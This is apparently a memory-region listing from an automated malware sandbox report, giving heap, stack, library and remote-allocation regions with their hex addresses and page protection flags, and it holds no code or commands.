||
1C7978D0000
|
heap
|
page read and write
|
||
4F1E000
|
stack
|
page read and write
|
||
AAA000
|
heap
|
page read and write
|
||
4DA2000
|
trusted library allocation
|
page read and write
|
||
7A3D000
|
stack
|
page read and write
|
||
56AB000
|
trusted library allocation
|
page read and write
|
||
2771000
|
trusted library allocation
|
page read and write
|
||
26BE000
|
stack
|
page read and write
|
||
582D000
|
trusted library allocation
|
page read and write
|
||
4EDD000
|
trusted library allocation
|
page read and write
|
||
4E0E000
|
trusted library allocation
|
page read and write
|
||
22184099000
|
heap
|
page read and write
|
||
567D000
|
trusted library allocation
|
page read and write
|
||
8110000
|
trusted library allocation
|
page read and write
|
||
89B0000
|
trusted library allocation
|
page execute and read and write
|
||
562C000
|
trusted library allocation
|
page read and write
|
||
53E4000
|
trusted library allocation
|
page read and write
|
||
4DE5000
|
trusted library allocation
|
page read and write
|
||
1FEEE1AA000
|
heap
|
page read and write
|
||
4FBA000
|
trusted library allocation
|
page read and write
|
||
4D9A000
|
trusted library allocation
|
page read and write
|
||
56AD000
|
trusted library allocation
|
page read and write
|
||
4358000
|
heap
|
page read and write
|
||
7AA0000
|
trusted library allocation
|
page read and write
|
||
553E000
|
trusted library allocation
|
page read and write
|
||
569E000
|
trusted library allocation
|
page read and write
|
||
C77000
|
heap
|
page read and write
|
||
4ECC000
|
trusted library allocation
|
page read and write
|
||
5548000
|
trusted library allocation
|
page read and write
|
||
519D000
|
trusted library allocation
|
page read and write
|
||
5BFE000
|
stack
|
page read and write
|
||
54E0000
|
trusted library allocation
|
page read and write
|
||
FD2FFFE000
|
stack
|
page read and write
|
||
55A0000
|
trusted library allocation
|
page read and write
|
||
58CA000
|
trusted library allocation
|
page read and write
|
||
6826C7C000
|
stack
|
page read and write
|
||
4E90000
|
trusted library allocation
|
page read and write
|
||
4E1D000
|
trusted library allocation
|
page read and write
|
||
54F9000
|
trusted library allocation
|
page read and write
|
||
7040000
|
trusted library allocation
|
page read and write
|
||
4DC0000
|
trusted library allocation
|
page read and write
|
||
6B8E000
|
stack
|
page read and write
|
||
4D64000
|
trusted library allocation
|
page read and write
|
||
5D57000
|
trusted library allocation
|
page read and write
|
||
4D72000
|
trusted library allocation
|
page read and write
|
||
2EAD000
|
stack
|
page read and write
|
||
7BB5000
|
trusted library allocation
|
page read and write
|
||
70DC000
|
stack
|
page read and write
|
||
5459000
|
trusted library allocation
|
page read and write
|
||
53A4000
|
trusted library allocation
|
page read and write
|
||
6C0E000
|
stack
|
page read and write
|
||
8120000
|
trusted library allocation
|
page read and write
|
||
38E000
|
stack
|
page read and write
|
||
4C4B000
|
trusted library allocation
|
page read and write
|
||
47AE000
|
stack
|
page read and write
|
||
22184045000
|
heap
|
page read and write
|
||
80E0000
|
heap
|
page execute and read and write
|
||
4FBE000
|
stack
|
page read and write
|
||
4E96000
|
trusted library allocation
|
page read and write
|
||
645F000
|
stack
|
page read and write
|
||
96B000
|
heap
|
page read and write
|
||
77C1000
|
heap
|
page read and write
|
||
5683000
|
trusted library allocation
|
page read and write
|
||
4DEF000
|
trusted library allocation
|
page read and write
|
||
5399000
|
trusted library allocation
|
page read and write
|
||
55CE000
|
trusted library allocation
|
page read and write
|
||
5403000
|
trusted library allocation
|
page read and write
|
||
4FAB000
|
trusted library allocation
|
page read and write
|
||
58DF000
|
trusted library allocation
|
page read and write
|
||
27F1000
|
trusted library allocation
|
page read and write
|
||
515D000
|
trusted library allocation
|
page read and write
|
||
8B30000
|
trusted library allocation
|
page read and write
|
||
4F3D000
|
trusted library allocation
|
page read and write
|
||
6E40000
|
trusted library allocation
|
page execute and read and write
|
||
3CC06FF000
|
stack
|
page read and write
|
||
6180000
|
trusted library allocation
|
page read and write
|
||
4C6C000
|
stack
|
page read and write
|
||
69B8000
|
heap
|
page read and write
|
||
FD2FBFF000
|
stack
|
page read and write
|
||
4F56000
|
trusted library allocation
|
page read and write
|
||
4F78000
|
trusted library allocation
|
page read and write
|
||
392319000
|
stack
|
page read and write
|
||
8625000
|
trusted library allocation
|
page read and write
|
||
890000
|
heap
|
page read and write
|
||
7E0000
|
heap
|
page read and write
|
||
30D3000
|
heap
|
page read and write
|
||
5195000
|
trusted library allocation
|
page read and write
|
||
57FF000
|
trusted library allocation
|
page read and write
|
||
59B0000
|
heap
|
page read and write
|
||
5514000
|
trusted library allocation
|
page read and write
|
||
80C0000
|
trusted library allocation
|
page read and write
|
||
3859000
|
trusted library allocation
|
page read and write
|
||
4F8A000
|
trusted library allocation
|
page read and write
|
||
7FA0000
|
trusted library section
|
page read and write
|
||
2F5E000
|
stack
|
page read and write
|
||
5630000
|
trusted library allocation
|
page read and write
|
||
1E13D854000
|
heap
|
page read and write
|
||
30F6000
|
heap
|
page read and write
|
||
4BB3000
|
heap
|
page read and write
|
||
78E0000
|
trusted library allocation
|
page read and write
|
||
B23000
|
heap
|
page read and write
|
||
4D30000
|
trusted library allocation
|
page read and write
|
||
276A000
|
trusted library allocation
|
page read and write
|
||
4F43000
|
trusted library allocation
|
page read and write
|
||
7AF0000
|
trusted library allocation
|
page read and write
|
||
5457000
|
trusted library allocation
|
page read and write
|
||
8AD0000
|
heap
|
page execute and read and write
|
||
402000
|
unkown
|
page readonly
|
||
4D6A000
|
trusted library allocation
|
page read and write
|
||
4E24000
|
trusted library allocation
|
page read and write
|
||
5133000
|
trusted library allocation
|
page read and write
|
||
4E1B000
|
trusted library allocation
|
page read and write
|
||
221840F2000
|
heap
|
page read and write
|
||
57FB000
|
trusted library allocation
|
page read and write
|
||
2620000
|
heap
|
page read and write
|
||
4FA3000
|
trusted library allocation
|
page read and write
|
||
7450000
|
heap
|
page read and write
|
||
548D000
|
trusted library allocation
|
page read and write
|
||
58E7000
|
trusted library allocation
|
page read and write
|
||
4CC8000
|
trusted library allocation
|
page read and write
|
||
29DE000
|
heap
|
page read and write
|
||
760E000
|
stack
|
page read and write
|
||
758E000
|
stack
|
page read and write
|
||
4D02000
|
trusted library allocation
|
page read and write
|
||
8C00000
|
trusted library allocation
|
page execute and read and write
|
||
476B000
|
stack
|
page read and write
|
||
296F000
|
heap
|
page read and write
|
||
59BF000
|
heap
|
page read and write
|
||
4DB8000
|
heap
|
page read and write
|
||
3010000
|
heap
|
page read and write
|
||
966000
|
heap
|
page read and write
|
||
27A0000
|
trusted library allocation
|
page read and write
|
||
397000
|
heap
|
page read and write
|
||
A60000
|
trusted library allocation
|
page read and write
|
||
52DE000
|
stack
|
page read and write
|
||
5168000
|
trusted library allocation
|
page read and write
|
||
53B6000
|
trusted library allocation
|
page read and write
|
||
8B20000
|
trusted library allocation
|
page read and write
|
||
4CAE000
|
stack
|
page read and write
|
||
1E13D868000
|
heap
|
page read and write
|
||
609B000
|
trusted library allocation
|
page read and write
|
||
93D0000
|
heap
|
page read and write
|
||
6E89000
|
trusted library allocation
|
page read and write
|
||
56BC000
|
trusted library allocation
|
page read and write
|
||
6E1D000
|
trusted library allocation
|
page read and write
|
||
4CF1000
|
trusted library allocation
|
page read and write
|
||
6E50000
|
trusted library allocation
|
page read and write
|
||
2535000
|
trusted library allocation
|
page execute and read and write
|
||
5643000
|
trusted library allocation
|
page read and write
|
||
390000
|
heap
|
page read and write
|
||
5397000
|
trusted library allocation
|
page read and write
|
||
5613000
|
trusted library allocation
|
page read and write
|
||
5EB0000
|
trusted library allocation
|
page execute and read and write
|
||
59FE000
|
stack
|
page read and write
|
||
5611000
|
trusted library allocation
|
page read and write
|
||
4CBB000
|
trusted library allocation
|
page read and write
|
||
4F62000
|
trusted library allocation
|
page read and write
|
||
1E13D87F000
|
heap
|
page read and write
|
||
5896000
|
trusted library allocation
|
page read and write
|
||
7F6B0000
|
trusted library allocation
|
page execute and read and write
|
||
8CF000
|
heap
|
page read and write
|
||
27E0000
|
heap
|
page execute and read and write
|
||
6D3B000
|
heap
|
page read and write
|
||
662F000
|
stack
|
page read and write
|
||
29FE000
|
heap
|
page read and write
|
||
3BE000
|
remote allocation
|
page execute and read and write
|
||
8650000
|
trusted library allocation
|
page read and write
|
||
51B2000
|
trusted library allocation
|
page read and write
|
||
55A2000
|
trusted library allocation
|
page read and write
|
||
240000
|
unkown
|
page readonly
|
||
5886000
|
trusted library allocation
|
page read and write
|
||
93B0000
|
heap
|
page read and write
|
||
ADE000
|
stack
|
page read and write
|
||
54F7000
|
trusted library allocation
|
page read and write
|
||
8B12000
|
trusted library allocation
|
page read and write
|
||
5F27000
|
trusted library allocation
|
page read and write
|
||
8B0000
|
trusted library allocation
|
page read and write
|
||
6178000
|
trusted library allocation
|
page read and write
|
||
1B79F800000
|
heap
|
page read and write
|
||
7D7000
|
heap
|
page read and write
|
||
8B5000
|
heap
|
page read and write
|
||
4F4A000
|
trusted library allocation
|
page read and write
|
||
4B10000
|
trusted library allocation
|
page execute and read and write
|
||
7A50000
|
trusted library allocation
|
page read and write
|
||
5436000
|
trusted library allocation
|
page read and write
|
||
5F00000
|
trusted library allocation
|
page read and write
|
||
5FF9000
|
trusted library allocation
|
page read and write
|
||
FD2F9FE000
|
stack
|
page read and write
|
||
22183FC0000
|
heap
|
page read and write
|
||
5193000
|
trusted library allocation
|
page read and write
|
||
7930000
|
trusted library allocation
|
page read and write
|
||
2532000
|
trusted library allocation
|
page read and write
|
||
584E000
|
trusted library allocation
|
page read and write
|
||
4D8E000
|
trusted library allocation
|
page read and write
|
||
5530000
|
trusted library allocation
|
page read and write
|
||
4E00000
|
trusted library allocation
|
page read and write
|
||
4B50000
|
trusted library allocation
|
page read and write
|
||
51BC000
|
trusted library allocation
|
page read and write
|
||
55BD000
|
trusted library allocation
|
page read and write
|
||
7020000
|
trusted library allocation
|
page read and write
|
||
89A000
|
heap
|
page read and write
|
||
56BA000
|
trusted library allocation
|
page read and write
|
||
252A000
|
trusted library allocation
|
page execute and read and write
|
||
4D9E000
|
trusted library allocation
|
page read and write
|
||
66C0000
|
trusted library allocation
|
page execute and read and write
|
||
1B79F720000
|
heap
|
page read and write
|
||
55A6000
|
trusted library allocation
|
page read and write
|
||
53CF000
|
trusted library allocation
|
page read and write
|
||
4D6E000
|
trusted library allocation
|
page read and write
|
||
4D8A000
|
trusted library allocation
|
page read and write
|
||
78B0000
|
trusted library allocation
|
page read and write
|
||
77E0000
|
heap
|
page read and write
|
||
5376000
|
trusted library allocation
|
page read and write
|
There are 1219 hidden memdumps, click here to show them.